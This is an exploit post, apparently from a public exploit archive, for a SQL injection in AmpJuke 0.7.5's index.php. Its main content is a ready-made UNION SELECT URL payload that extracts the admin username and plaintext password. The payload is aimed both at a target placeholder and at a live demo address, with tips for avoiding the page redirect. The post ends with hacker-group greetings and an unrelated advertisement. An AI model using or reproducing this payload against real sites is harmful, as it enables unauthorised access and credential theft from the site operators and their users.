AmpJuke version 0.7.5 suffers from a remote SQL injection vulnerability in index.php.
4eda65f53d67a572474e8ca9adb9d46023f2183e68de6551f5c2c0b92f31413f
############################################################
|-------------------------(S_DLA_S)-------------------------
|
| Script : AmpJuke 0.7.5
| Vuln. Type : SQL Injection
| Founded By : S_DLA_S Th3 1r4Q1 Cr4Ck3r
| CoNt4Ct : sdlas[at]Hotmail[d0t]Fr
| Home : wWw.Iq-Ty.CoM | WwW.SdlaS-IQ.Co.CC
|
#############################################################
Th3 eXpl0T :
WwW.[Target].co.il/[script]/index.php?what=performerid&start=0&count='20&special=-2/**/UNION/**/SELECT/**/1,concat(name,0x3A7C3A,password)/**/FROM/**/user/**/WHERE/**/id=1/*
ps 1: Th3 Admin's Username And Pass Will Show up In The Title
like username:|:password
ps 2: Th3 pass will Sh0w up N0t encrypted lo0olz
L!v3 D3m0 :
http://www.ampjuke.org/ampjukedemo/index.php?what=performerid&start=0&count='20&special=-2/**/UNION/**/SELECT/**/1,concat(name,0x3A7C3A,password)/**/FROM/**/user/**/WHERE/**/id=1/*
Notice :
1.Th3 Admin's Username And Pass Will Show up In The Title
like username:|:password
2.Th3 pass will Sh0w up N0t encrypted lo0olz
3.Stop Th3 page Before it's Fully loaded Cuz U will Be redirected or Disable Java Script
################################################################
|---------------------------(S_DLA_S)---------------------------
| Gr33tz 2 All Th3 M3mb3rz Of : WwW.Iq-Ty.c0M | wWw.TryAg.cc/cc
| Gr33tz 2: H-T Team specially Houssamix | Hussin-X | str0ke
| Karar Alshame | Cyber-Zone | All Muslim H4Ck3rz
| I am IRAQI
################################################################
_________________________________________________________________
Sur Windows Live Ideas, découvrez en exclusivité de nouveaux services en ligne... si nouveaux qu'ils ne sont pas encore sortis officiellement sur le marché !
http://ideas.live.com